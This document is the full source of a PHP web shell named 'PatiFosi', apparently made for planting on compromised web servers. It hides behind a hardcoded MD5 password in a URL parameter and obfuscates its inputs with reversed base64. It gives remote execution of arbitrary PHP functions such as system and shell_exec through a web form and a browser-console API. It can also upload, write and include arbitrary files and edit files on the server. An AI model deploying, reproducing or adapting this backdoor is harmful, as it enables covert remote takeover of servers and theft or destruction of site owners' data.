<?php error_reporting(0); header("X-XSS-Protection: 0"); //config login // localhost/patifosi.php?login=gans $param = 'login'; // login input $pw = 'e5e32f8c9a2e843080f5176871e8cd32'; // md5 password default = gans $inDir = true; // true or false, to enable input dir $out = 'exit;'; // string, not login $enc = true; // js must enabled, editor & upload not encoded $img = 'https://i.ibb.co/nn0TWhS/patifosi.gif'; // variable $dirGet = $_GET['dir']; $dirGET = $_GET['dir']; $file = $_GET['file']; $func = $_GET['func']; $arg = $_GET['arg']; $mode = $_GET['mode']; $type = $_GET['type']; $pass = $_GET[$param]; $md5 = md5("$_GET[$param]"); $host = $_SERVER['HTTP_HOST']; $uplto = $_POST['uplto']; $saveto = $_POST['saveto']; $file = $_POST['file']; $sec = $_GET['sec']; $sc = $_SERVER['SCRIPT_NAME']; // decode function dec($str){ $str = base64_decode(strrev("$str")); return str_replace('=', '-', "$str"); } if($enc == true && isset($dirGet)){ $dirGet = dec($dirGet); $func = dec($func); $arg = dec($arg); $uplto = dec($uplto); $saveto = dec($saveto); $file = dec($file); }; // login if($md5 !== $pw){ die("$out"); exit; } // tq $w = array("pescyte", "idbte4m", "javcode", "zerobyte", "idxSmg", "patiUndetektet", "date"=>"28 Mei 2018", "new date"=>"16 Mei 2020"); // sorry for bad code // // just for fun // // checked type if($type){ $typeChecked = "checked"; }; // checked iframe if($sec){ $cekSec = "checked"; }; // chdir if($dirGet){ chdir($dirGet); }; // directory $dirNow = getcwd(); // button encode if($enc){ $encButton = 'enc()'; }else{ $encButton = ''; }; // upl dir if($uplto){ $uplto = $uplto; }else{ $uplto = $dirNow; }; // save dir if($saveto){ $saveto = $saveto; }else{ $saveto = $dirNow; }; // input dir if($inDir){ $inputDir = "<th style='display:inline-block'>dir<br><input autocomplete='off' class='encode' type='text' name='dir' value='$dirNow' placeholder='/var/www/html'> </th>"; } else { $Hidinput = "<input class='encode' type='hidden' name='dir' value='$dirNow'>"; }; // codemirror library in mode=edit if($mode == edit){ $codemirror = " <script src='//codemirror.net/lib/codemirror.js'></script> <link rel='stylesheet' href='//codemirror.net/lib/codemirror.css'> <script src='//codemirror.net/mode/javascript/javascript.js'></script> <link rel='stylesheet' href='//codemirror.net/theme/monokai.css'> <script src='//codemirror.net/addon/edit/matchbrackets.js'></script> "; }; // ?mode=api if($mode == api){ $dirGet = dec($_GET['dir']); $func = dec($_GET['func']); $arg = dec($_GET['arg']); chdir($dirGet); if (function_exists($func)) { @die($func($arg)); }else{ echo 'failed'; } exit; } $apiJs = "var dirNow = '$dirNow'; var func; var arg; var login = '$host$sc?$param=$pass'; var api = login+'&mode=api'; var reqDir = api+'&dir='+rev(btoa(dirNow)).replace('=', '-'); clear(); function dir(){ console.log(dirNow); }; function cd(a){ dirNow = a; var b = rev(btoa(a)).replace('=', '-'); reqDir = api+'&dir='+b console.log(dirNow); }; function go(a){ var xmlhttp = new XMLHttpRequest(); xmlhttp.timeout = 600000; xmlhttp.onreadystatechange = function() { if (this.readyState == 4 && this.status == 200) { console.log(this.responseText); } }; xmlhttp.ontimeout = function (e) { console.log('time out'); }; xmlhttp.open('GET', a, true); xmlhttp.send(); };" . ' function clear(){ console.clear(); console.log("%cPatiFosi", "background:#ff6b81; color:#2f3542; font-size:30px; font-family: Arial, Helvetica, sans-serif;"); console.log("dir()\t\t\t\t\t\/\/ show dir now\r\ncd(\"\/www\/html\/tmp\")\t\t\/\/ change dir\r\nrun(\"system\", \"ls\")\t\t\/\/ run command\r\nclear()"); }' . " function run(f, n){ f = rev(btoa(f)).replace('=', '-'); n = rev(btoa(n)).replace('=', '-'); l = reqDir+'&func='+f+'&arg='+n; go('//'+l); }; "; // ?mode=iframe if($mode == iframe){ die("<title>PatiFosi</title><link rel='icon' href='$img' type='image/gif'><iframe src='?$param=$pass&mode=command' style='position:fixed; top:0px; bottom:0px; right:0px; width: 100%; border: none; margin:0; padding:0; overflow: hidden; z-index:999999; height: 100%;'></iframe><script>function rev(str) {return str.split('').reverse().join('');}$apiJs</script>"); exit; } // run code if($_POST['run']){ $code = $_POST['code']; if($_POST['tmp']){ $tmp_file = dec($_POST['tmp']); }else{ $tmp_file = tempnam(sys_get_temp_dir(), ''); }; if(file_put_contents("$tmp_file","$code")){ $tmp_run = "<mark style='background: #ffffff'><a href='?$param=$pass&run=$tmp_file' target='_blank' style='color:#2ed573'> run click here</a> -> $tmp_file"; }else{ $tmp_run = "<mark style='background: #ffffff'><a style='color:#ff4757'> failed saving tmp -> $tmp_file"; }; }; if($_GET['run']){ $runIn = $_GET['run']; include "$runIn"; unlink($runIn); exit; }; // header html echo "<html> <head> <title>PatiFosi</title> <link rel='icon' href='$img' type='image/gif'> <style> #clear { text-decoration: none; } .shadow { -moz-box-shadow: 4px 5px 7px rgba(0, 0, 0,0.5); -webkit-box-shadow: 4px 5px 7px rgba(0, 0, 0, .5); box-shadow: 4px 5px 7px rgba(0, 0, 0, .5); } input { background-color: #ffffff; color: #2f3542; } </style> $codemirror <script> function rev(str) { return str.split('').reverse().join(''); } function enc() { var x = document.getElementsByClassName('encode'); var i; for (i = 0; i < x.length; i++) { x[i].value = rev(btoa(x[i].value)).replace('=', '-'); } } function decFunc(){ var i; var a = document.getElementById('funcList').options; var b = document.getElementById('funcList'); var c = document.getElementById('func'); for (i = 0; i < a.length; i++) { b.options[i].value = atob(rev(b.options[i].value).replace('-', '=')); } c.setAttribute('onfocus', '') } function isiArg(){ var a = document.getElementById('func').value; var b = document.getElementById('arg'); var c = document.getElementById('funcList'); if (a == c.options[0].value) { b.value = '123'; } else if (a == c.options[1].value) { b.value = '/'; } else if (a == c.options[5].value) { b.value = '.'; } else if (a == c.options[2].value || a == c.options[3].value || a == c.options[4].value) { b.value = 'ls'; } else if (a == c.options[6].value) { b.value = '*.html'; } else if (a == c.options[7].value || a == c.options[8].value || a == c.options[9].value || a == c.options[10].value || a == c.options[11].value || a == c.options[13].value) { b.value = 'file.php'; } else if (a == c.options[12].value) { b.value = 'new'; } } $apiJs </script> </head> <body style='padding:5%; padding-top:2%; border: 3px solid #2f3542; font-family: Arial, Helvetica, sans-serif; background:#f1f2f6;'> <datalist id='funcList'> <option value='-=wbm5WawhGc'> <option value='-=QZjFGcz9FbhR3b091azlGZ'> <option value='tVGdzl3c'> <option value='-UncoR3czFGc'> <option value='-=wYlhXZfxGblh2c'> <option value='-=gcpRmbhN2c'> <option value='-=gYvx2Z'> <option value='MHduVGdu92YfRXZn9VZslmZ'> <option value='-UGbpZGZhVmc'> <option value='-UGbpZ2X0h2ZpxGanlGa'> <option value='-=QZslmZ'> <option value='r5Was5Wd'> <option value='-IXaktWb'> <option value='-g2Y19Gd'> </datalist> <center><h1 style='color:#2f3542'>PatiFosi</h1></center> <a style='font-size:10; color:#ff4757'>$host</a> <a style='font-size:10; color:#a4b0be'>@</a> <a style='font-size:10; color:#2f3542'>$dirNow</a> <a style='font-size:10; color:#ff4757' href='?$param=$pass'>[Home]</a><center> <div style='background-color: #ff6b81'> <a id='clear' style='color:#2f3542' href='?$param=$pass&mode=command&dir=$dirGET'>[command] - </a> <a id='clear' style='color:#2f3542' href='?$param=$pass&mode=edit&dir=$dirGET'>[edit] - </a> <a id='clear' style='color:#2f3542' href='?$param=$pass&mode=about&dir=$dirGET'>[about] </a> </div> <br><br> "; // mode command if ($mode == "command") { $arg2 = htmlspecialchars($arg, ENT_QUOTES, 'UTF-8'); echo " <form method='get' autocomplete='off'> <table id='clear' style='text-align:center'> <input type='hidden' name='$param' value='$pass'> <input type='hidden' name='mode' value='command'> $Hidinput <tr> <th style='display:inline-block'>iframe<br><input type='checkbox' name='sec' value='y' $cekSec> </th> $inputDir <th style='display:inline-block'>func<br><input oninput='isiArg()' id='func' onfocus='decFunc()' list='funcList' class='encode' type='text' name='func' value='$func' placeholder='system'> </th> <th style='display:inline-block'>arg<br><input id='arg' class='encode' type='text' name='arg' value='$arg2' placeholder='ls'> </th> <td><br><input type='checkbox' name='type' value='checked' $typeChecked >array <input onclick='$encButton' type='submit' value='Submit' style='background-color: #57606f;color: #f1f2f6;'> </td> </tr> </table> </form> </center><br> <pre style='background:#dfe4ea; color: #2f3542; border-right: 6px solid #ced6e0;'>"; if($type == 'checked'){ echo "<i>var_dump($func($arg));</i><br>"; if (function_exists($func)) { if($sec == 'y'){ ob_start(); @var_dump($func($arg)); $run = ob_get_clean(); echo("</pre><iframe class='shadow' style='border:none' width='100%' height='100%' src='data:text/html;base64," . base64_encode($run) . "'></iframe>"); } else { @var_dump($func($arg)); } } } else { if (function_exists($func)) { if($sec == 'y'){ ob_start(); echo($func($arg)); $run = ob_get_clean(); echo "<i>echo($func($arg));</i><br>"; echo("</pre><iframe class='shadow' style='border:none' width='100%' height='100%' src='data:text/html;base64," . base64_encode($run) . "'></iframe>"); } else { echo "<i>die($func($arg));</i><br>"; @die($func($arg)); } } } // mode edit } elseif ($mode == "edit") { $arg2 = htmlspecialchars($arg, ENT_QUOTES, 'UTF-8'); echo " <form method='get'> <table id='clear' style='text-align:center'> <input type='hidden' name='$param' value='$pass'> <input type='hidden' name='mode' value='edit'> $Hidinput <tr> $inputDir <th style='display:inline-block'>func<br><input oninput='isiArg()' id='func' onfocus='decFunc()' list='funcList' autocomplete='off' class='encode' type='text' name='func' value='$func' placeholder='readfile'> </th> <th style='display:inline-block'>arg<br><input id='arg' autocomplete='off' class='encode' type='text' name='arg' value='$arg2' placeholder='file.php'> </th> <td><br><input type='checkbox' name='type' value='ob' $typeChecked>ob <input onclick='$encButton' type='submit' value='Submit' style='background-color: #57606f;color: #f1f2f6;'> </td> </tr> </table> </form></center> <div align='right'> <button class='shadow' type='button' onclick='fullN()' style='border-radius: 50%; border: none; background-color: #eccc68; color: #f1f2f6; text-align:right'>_</button> <button class='shadow' type='button' onclick='full()' style='border-radius: 50%; border: none; background-color: #2ed573; color: #f1f2f6; text-align:right'>_</button> <button class='shadow' type='button' onclick='reset()' style='border-radius: 50%; border: none; background-color: #ff4757; color: #f1f2f6; text-align:right'>_</button> <br></div> <form method='post' action='?$param=$pass&mode=edit&dir=$dirGET&type=$type' enctype='multipart/form-data'> <div class='shadow'><textarea id='codemirror' name='code' style='width:100%; height: 50%;'>"; // codemirror if(!empty($_GET['func']) && !empty($_GET['arg'])){ if($_GET['type'] !== 'ob'){ echo(htmlspecialchars($func($arg))); } else { ob_start(); htmlspecialchars($func($arg)); $run = ob_get_clean(); echo(htmlspecialchars($run)); }; }elseif($_POST['code']){ echo(htmlspecialchars($_POST['code'])); }; echo "</textarea></div><br><input type='hidden' name='tmp' class='encode' value='$tmp_file'><input onclick='$encButton' type='submit' name='run' value='run >>' style='background-color: #747d8c;color: #f1f2f6; float: right;'> <table style='width:100%'> <tr style='text-align:center'> <th style='display:inline-block; padding-right:10%; padding-left:10%;'>upload<br><input autocomplete='off' class='encode' type='text' name='uplto' value='$uplto' placeholder='$dirNow'><br><input type='file' name='datupload' style='border: 1px solid #dfe4ea; background:#f1f2f6;'><br><input onclick='$encButton' type='submit' name='uploadsubmit' value='upload' style='background-color: #57606f;color: #f1f2f6;'> </th> <th style='display:inline-block; padding-left:10%; padding-right:10%;'>save<br><input autocomplete='off' class='encode' type='text' name='saveto' value='$saveto' placeholder='$dirNow'><br><input autocomplete='off' class='encode' type='text' name='file' value='$file' placeholder='file.php'><br><input onclick='$encButton' type='submit' name='savesubmit' value='save' style='background-color: #57606f;color: #f1f2f6;'> </form></th> </tr> </table> <script> var myCodeMirror = CodeMirror.fromTextArea(document.getElementById('codemirror'), { theme: 'monokai', lineNumbers: true, matchBrackets: true, mode: 'javascript', viewportMargin: false, }); function full(){ myCodeMirror.setSize('100%', '100%'); } function fullN(){ myCodeMirror.setSize('100%', '60%'); } function reset() { var txt; if (confirm('Ar u sure wanna reset d code?')) { myCodeMirror.setValue(''); } } </script> "; echo "<center><hr style='border-top: 1px solid #dfe4ea' width='90%'><h4>"; if(isset($_POST['savesubmit'])){ if(!chdir($saveto)){ die("<mark style='background: #ffffff'><a style='color:#ff4757'> directory not exist -> $saveto"); }; $fpc = 'file_p' . 'ut_contents'; $write = $fpc($file, $_POST['code']); if($write) { die("<mark style='background: #ffffff'><a style='color:#2ed573'> saved -> $file"); } else { die("<mark style='background: #ffffff'><a style='color:#ff4757'> failed save -> $file"); } } elseif(isset($_POST['uploadsubmit'])){ if(!chdir($uplto)){ die("<mark style='background: #ffffff'><a style='color:#ff4757'> directory not exist -> $uplto"); }; $uploadname = $_FILES['datupload']['name']; $uploadtmp = $_FILES['datupload']['tmp_name']; $write = copy($uploadtmp, $uploadname); if($write) { die("<mark style='background: #ffffff'><a style='color:#2ed573'> uploaded -> $uploadname"); } else { die("<mark style='background: #ffffff'><a style='color:#ff4757'> failed upload -> $uploadname"); } } elseif($tmp_run){ die("$tmp_run"); }; // mode about } elseif ($mode == "about") { echo '</center><pre style="background:#dfe4ea; color: #2f3542; border-right: 6px solid #ced6e0;"><i>var_dump($w);</i><br>'; echo var_dump($w); } else { echo "<img src='$img'><br>what ar u doin?<br>dont forget to open <b>console.log<b><br><br><a style='font-size:10; color:#ff4757' href='?$param=$pass&mode=iframe'>[Go to iframe mode]</a> <noscript><i>javascript isn't running</i></noscript><script> if(!navigator.onLine) { alert('u must connect internet for best experience'); } </script>"; };